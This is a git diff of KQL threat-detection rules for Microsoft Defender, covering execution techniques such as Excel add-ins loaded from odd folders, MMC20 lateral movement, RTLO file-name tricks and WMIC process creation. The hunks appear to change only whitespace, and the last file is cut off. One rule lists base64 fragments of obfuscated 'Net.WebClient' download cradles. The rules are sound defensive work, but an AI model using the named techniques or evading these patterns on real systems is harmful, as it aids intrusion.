diff --git a/KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql b/KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql
index 2c66a4e1..0ed18510 100644
--- a/KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql
+++ b/KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql
@@ -1,12 +1,12 @@
-// Title: Microsoft Excel Add-In Loaded From Uncommon Location
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-12
-// Level: medium
-// Description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.002
-// False Positives:
-// - Some tuning might be required to allow or remove certain locations used by the rule if you consider them as safe locations
-
-DeviceImageLoadEvents
+// Title: Microsoft Excel Add-In Loaded From Uncommon Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-12
+// Level: medium
+// Description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+// - Some tuning might be required to allow or remove certain locations used by the rule if you consider them as safe locations
+
+DeviceImageLoadEvents
 | where (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Perflogs\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Tasks\\") and FolderPath endswith ".xll" and InitiatingProcessFolderPath endswith "\\excel.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql b/KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql
index 53a1c169..61e657fb 100644
--- a/KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql
+++ b/KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql
@@ -1,12 +1,12 @@
-// Title: Microsoft VBA For Outlook Addin Loaded Via Outlook
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-08
-// Level: medium
-// Description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.002
-// False Positives:
-// - Legitimate macro usage. Add the appropriate filter according to your environment
-
-DeviceImageLoadEvents
+// Title: Microsoft VBA For Outlook Addin Loaded Via Outlook
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: medium
+// Description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+// - Legitimate macro usage. Add the appropriate filter according to your environment
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\outlvba.dll" and InitiatingProcessFolderPath endswith "\\outlook.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/mmc20_lateral_movement.kql b/KQL/rules/Execution/mmc20_lateral_movement.kql
index 9118011c..bba62e68 100644
--- a/KQL/rules/Execution/mmc20_lateral_movement.kql
+++ b/KQL/rules/Execution/mmc20_lateral_movement.kql
@@ -1,12 +1,12 @@
-// Title: MMC20 Lateral Movement
-// Author: @2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)
-// Date: 2020-03-04
-// Level: high
-// Description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.lateral-movement, attack.t1021.003
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: MMC20 Lateral Movement
+// Author: @2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)
+// Date: 2020-03-04
+// Level: high
+// Description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1021.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-Embedding" and FolderPath endswith "\\mmc.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql b/KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql
index d33c3002..ee4ffaf4 100644
--- a/KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql
+++ b/KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql
@@ -1,13 +1,13 @@
-// Title: MMC Executing Files with Reversed Extensions Using RTLO Abuse
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-02-05
-// Level: high
-// Description: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.014, attack.t1036.002
-// False Positives:
-// - Legitimate administrative actions using MMC to execute misnamed `.msc` files.
-// - Unconventional but non-malicious usage of RLO or reversed extensions.
-
-DeviceProcessEvents
+// Title: MMC Executing Files with Reversed Extensions Using RTLO Abuse
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: high
+// Description: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.014, attack.t1036.002
+// False Positives:
+// - Legitimate administrative actions using MMC to execute misnamed `.msc` files.
+// - Unconventional but non-malicious usage of RLO or reversed extensions.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "cod.msc" or ProcessCommandLine contains "fdp.msc" or ProcessCommandLine contains "ftr.msc" or ProcessCommandLine contains "lmth.msc" or ProcessCommandLine contains "slx.msc" or ProcessCommandLine contains "tdo.msc" or ProcessCommandLine contains "xcod.msc" or ProcessCommandLine contains "xslx.msc" or ProcessCommandLine contains "xtpp.msc") and (FolderPath endswith "\\mmc.exe" or ProcessVersionInfoOriginalFileName =~ "MMC.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql b/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql
index e4b8f77e..460baa31 100644
--- a/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql
+++ b/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql
@@ -1,13 +1,13 @@
-// Title: MMC Loading Script Engines DLLs
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-02-05
-// Level: medium
-// Description: Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt
-// to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1059.005, attack.t1218.014
-// False Positives:
-// - Legitimate MMC operations or extensions loading these libraries
-
-DeviceImageLoadEvents
+// Title: MMC Loading Script Engines DLLs
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: medium
+// Description: Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt
+// to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059.005, attack.t1218.014
+// False Positives:
+// - Legitimate MMC operations or extensions loading these libraries
+
+DeviceImageLoadEvents
 | where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\jscript9.dll") and InitiatingProcessFolderPath endswith "\\mmc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/named_pipe_created_via_mkfifo.kql b/KQL/rules/Execution/named_pipe_created_via_mkfifo.kql
index f617b3f4..bc0c6ea5 100644
--- a/KQL/rules/Execution/named_pipe_created_via_mkfifo.kql
+++ b/KQL/rules/Execution/named_pipe_created_via_mkfifo.kql
@@ -1,10 +1,10 @@
-// Title: Named Pipe Created Via Mkfifo
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-16
-// Level: low
-// Description: Detects the creation of a new named pipe using the "mkfifo" utility
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Named Pipe Created Via Mkfifo
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: low
+// Description: Detects the creation of a new named pipe using the "mkfifo" utility
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where FolderPath endswith "/mkfifo"
\ No newline at end of file
diff --git a/KQL/rules/Execution/net_webclient_casing_anomalies.kql b/KQL/rules/Execution/net_webclient_casing_anomalies.kql
index 0917a37e..f63a8bc5 100644
--- a/KQL/rules/Execution/net_webclient_casing_anomalies.kql
+++ b/KQL/rules/Execution/net_webclient_casing_anomalies.kql
@@ -1,10 +1,10 @@
-// Title: Net WebClient Casing Anomalies
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-05-24
-// Level: high
-// Description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Net WebClient Casing Anomalies
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-05-24
+// Level: high
+// Description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "TgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAEIA" or ProcessCommandLine contains "OAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBiA" or ProcessCommandLine 
contains "TgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAYg" or ProcessCommandLine contains "4ARQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBiA" or ProcessCommandLine contains 
"TgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAEIA" or 
ProcessCommandLine contains "uAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "uAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAEIA" or ProcessCommandLine contains "OAGUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBCA" or ProcessCommandLine 
contains "bgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBCA") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql b/KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql
index 8ac9c9e2..4ffa0cdd 100644
--- a/KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql
+++ b/KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql
@@ -1,12 +1,12 @@
-// Title: Network Connection Initiated By Eqnedt32.EXE
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022-04-14
-// Level: high
-// Description: Detects network connections from the Equation Editor process "eqnedt32.exe".
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1203
-// False Positives:
-// - Unlikely
-
-DeviceNetworkEvents
+// Title: Network Connection Initiated By Eqnedt32.EXE
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-04-14
+// Level: high
+// Description: Detects network connections from the Equation Editor process "eqnedt32.exe".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203
+// False Positives:
+// - Unlikely
+
+DeviceNetworkEvents
 | where InitiatingProcessFolderPath endswith "\\eqnedt32.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql b/KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql
index e211f769..247bc43b 100644
--- a/KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql
+++ b/KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql
@@ -1,10 +1,10 @@
-// Title: Network Connection Initiated By Regsvr32.EXE
-// Author: Dmitriy Lifanov, oscd.community
-// Date: 2019-10-25
-// Level: medium
-// Description: Detects a network connection initiated by "Regsvr32.exe"
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1559.001, attack.defense-evasion, attack.t1218.010
-
-DeviceNetworkEvents
+// Title: Network Connection Initiated By Regsvr32.EXE
+// Author: Dmitriy Lifanov, oscd.community
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects a network connection initiated by "Regsvr32.exe"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1559.001, attack.defense-evasion, attack.t1218.010
+
+DeviceNetworkEvents
 | where InitiatingProcessFolderPath endswith "\\regsvr32.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/new_application_in_appcompat.kql b/KQL/rules/Execution/new_application_in_appcompat.kql
index a149633e..f2dc52c1 100644
--- a/KQL/rules/Execution/new_application_in_appcompat.kql
+++ b/KQL/rules/Execution/new_application_in_appcompat.kql
@@ -1,14 +1,14 @@
-// Title: New Application in AppCompat
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-05-02
-// Level: informational
-// Description: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.002
-// False Positives:
-// - This rule is to explore new applications on an endpoint. False positives depends on the organization.
-// - Newly setup system.
-// - Legitimate installation of new application.
-
-DeviceRegistryEvents
+// Title: New Application in AppCompat
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: informational
+// Description: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+// - This rule is to explore new applications on an endpoint. False positives depends on the organization.
+// - Newly setup system.
+// - Legitimate installation of new application.
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\AppCompatFlags\\Compatibility Assistant\\Store*"
\ No newline at end of file
diff --git a/KQL/rules/Execution/new_process_created_via_wmic_exe.kql b/KQL/rules/Execution/new_process_created_via_wmic_exe.kql
index d3ce7551..44fb1394 100644
--- a/KQL/rules/Execution/new_process_created_via_wmic_exe.kql
+++ b/KQL/rules/Execution/new_process_created_via_wmic_exe.kql
@@ -1,10 +1,10 @@
-// Title: New Process Created Via Wmic.EXE
-// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community
-// Date: 2019-01-16
-// Level: medium
-// Description: Detects new process creation using WMIC via the "process call create" flag
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047, car.2016-03-002
-
-DeviceProcessEvents
+// Title: New Process Created Via Wmic.EXE
+// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects new process creation using WMIC via the "process call create" flag
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, car.2016-03-002
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "process" and ProcessCommandLine contains "call" and ProcessCommandLine contains "create") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql b/KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql
index 48a354d5..cdae2f59 100644
--- a/KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql
+++ b/KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql
@@ -1,12 +1,12 @@
-// Title: New Virtual Smart Card Created Via TpmVscMgr.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-15
-// Level: medium
-// Description: Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Legitimate usage by an administrator
-
-DeviceProcessEvents
+// Title: New Virtual Smart Card Created Via TpmVscMgr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-15
+// Level: medium
+// Description: Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate usage by an administrator
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "create" and (FolderPath endswith "\\tpmvscmgr.exe" and ProcessVersionInfoOriginalFileName =~ "TpmVscMgr.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql b/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql
index 92d6c71a..589c7d9f 100644
--- a/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql
+++ b/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql
@@ -1,15 +1,15 @@
-// Title: NodeJS Execution of JavaScript File
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-04-21
-// Level: low
-// Description: Detects execution of JavaScript or JSC files using NodeJs binary node.exe, that could be potentially suspicious.
-// Node.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development.
-// Adversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems.
-// Because Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.007
-// False Positives:
-// - Legitimate use of node.exe to execute JavaScript or JSC files on your environment
-
-DeviceProcessEvents
+// Title: NodeJS Execution of JavaScript File
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-21
+// Level: low
+// Description: Detects execution of JavaScript or JSC files using NodeJs binary node.exe, that could be potentially suspicious.
+// Node.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development.
+// Adversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems.
+// Because Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.007
+// False Positives:
+// - Legitimate use of node.exe to execute JavaScript or JSC files on your environment
+
+DeviceProcessEvents
 | where ProcessCommandLine contains ".js" and (FolderPath endswith "\\node.exe" or ProcessVersionInfoOriginalFileName =~ "node.exe" or ProcessVersionInfoProductName =~ "Node.js")
\ No newline at end of file
diff --git a/KQL/rules/Execution/nohup_execution.kql b/KQL/rules/Execution/nohup_execution.kql
index a579be68..e2fa1204 100644
--- a/KQL/rules/Execution/nohup_execution.kql
+++ b/KQL/rules/Execution/nohup_execution.kql
@@ -1,12 +1,12 @@
-// Title: Nohup Execution
-// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
-// Date: 2022-06-06
-// Level: medium
-// Description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.004
-// False Positives:
-// - Administrators or installed processes that leverage nohup
-
-DeviceProcessEvents
+// Title: Nohup Execution
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-06
+// Level: medium
+// Description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004
+// False Positives:
+// - Administrators or installed processes that leverage nohup
+
+DeviceProcessEvents
 | where FolderPath endswith "/nohup"
\ No newline at end of file
diff --git a/KQL/rules/Execution/non_interactive_powershell_process_spawned.kql b/KQL/rules/Execution/non_interactive_powershell_process_spawned.kql
index cad06e5b..c25b5fad 100644
--- a/KQL/rules/Execution/non_interactive_powershell_process_spawned.kql
+++ b/KQL/rules/Execution/non_interactive_powershell_process_spawned.kql
@@ -1,12 +1,12 @@
-// Title: Non Interactive PowerShell Process Spawned
-// Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
-// Date: 2019-09-12
-// Level: low
-// Description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-// False Positives:
-// - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies
-
-DeviceProcessEvents
+// Title: Non Interactive PowerShell Process Spawned
+// Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
+// Date: 2019-09-12
+// Level: low
+// Description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
